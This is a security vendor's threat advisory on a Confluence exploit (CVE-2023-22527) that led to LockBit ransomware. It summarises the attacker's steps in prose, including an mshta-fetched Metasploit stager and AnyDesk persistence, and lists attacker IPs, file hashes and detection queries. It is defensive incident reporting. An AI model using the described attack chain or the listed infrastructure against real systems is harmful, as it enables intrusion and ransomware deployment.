Confluence Exploit Leads to LockBit Ransomware

    Friday, February 28, 2025 In: Threat Research Print

    Date: 02/28/2025

    Severity: Critical

    Summary

    The attack began with the exploitation of CVE-2023-22527, a critical RCE vulnerability in Confluence, on a Windows server. Initial signs of activity included system discovery commands like net user and whoami. The attacker attempted to download AnyDesk via curl, failing at first but later retrieving it using mshta and a remote HTA file containing a Metasploit stager. After establishing command and control, they installed AnyDesk with a preset password, ensuring persistent remote access.

    Indicators of Compromise (IOC) List

    IP Address : 

    92.51.2.22

    92.51.2.27

    Hash : 

    438448FDC7521ED034F6DABDF814B6BA

F08E7343A94897ADEAE78138CC3F9142ED160A03

1E2E25A996F72089F12755F931E7FCA9B64DD85B03A56A9871FD6BB8F2CF1DBB

D7ADDB5B6F55EAB1686410A17B3C867B

A54AF16B2702FE0E5C569F6D8F17574A9FDAF197

498BA0AFA5D3B390F852AF66BD6E763945BF9B6BFF2087015ED8612A18372155

9D495530A421A7C7E113B7AFC3A50504

02D291E2FF5799A13EACC72AD0758F2C5E69D414

594F2F8AB05F88F765D05EB1CF24E4C697746905A61ED04A6FC2B744DD6FEBB0

3BD63B2962D41D2E29E570238D28EC0E

9537E1C4E5DDD7FB9B98C532CA89A9DB08262AB4

7AA8E510B9C3B5D39F84E4C2FA68C81DA888E091436FDB7FEE276EE7FF87F016

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    IP Address :

    dstipaddress IN ("92.51.2.22","92.51.2.27") or ipaddress IN ("92.51.2.22","92.51.2.27") or publicipaddress IN ("92.51.2.22","92.51.2.27") or srcipaddress IN ("92.51.2.22","92.51.2.27")

    Hash 1:

    sha1hash IN ("A54AF16B2702FE0E5C569F6D8F17574A9FDAF197","F08E7343A94897ADEAE78138CC3F9142ED160A03","02D291E2FF5799A13EACC72AD0758F2C5E69D414","9537E1C4E5DDD7FB9B98C532CA89A9DB08262AB4")

    Hash 2: 

    md5hash IN ("438448FDC7521ED034F6DABDF814B6BA","D7ADDB5B6F55EAB1686410A17B3C867B","9D495530A421A7C7E113B7AFC3A50504","3BD63B2962D41D2E29E570238D28EC0E")

    Hash 3:

    sha256hash IN ("498BA0AFA5D3B390F852AF66BD6E763945BF9B6BFF2087015ED8612A18372155","1E2E25A996F72089F12755F931E7FCA9B64DD85B03A56A9871FD6BB8F2CF1DBB","594F2F8AB05F88F765D05EB1CF24E4C697746905A61ED04A6FC2B744DD6FEBB0","7AA8E510B9C3B5D39F84E4C2FA68C81DA888E091436FDB7FEE276EE7FF87F016")

    Reference:

    https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/#indicators


    Tags

    MalwareExploitRansomwareMetasploitLockbitCVE-2023

    « Previous ArticleNext Article »

    Comments

    No records to display

    Looking for Something?
    Threat Research Categories:
    Tags

    Privacy & Security StatementTerms & Conditions
    Copyright © 2025 by Gurucul - All rights reserved.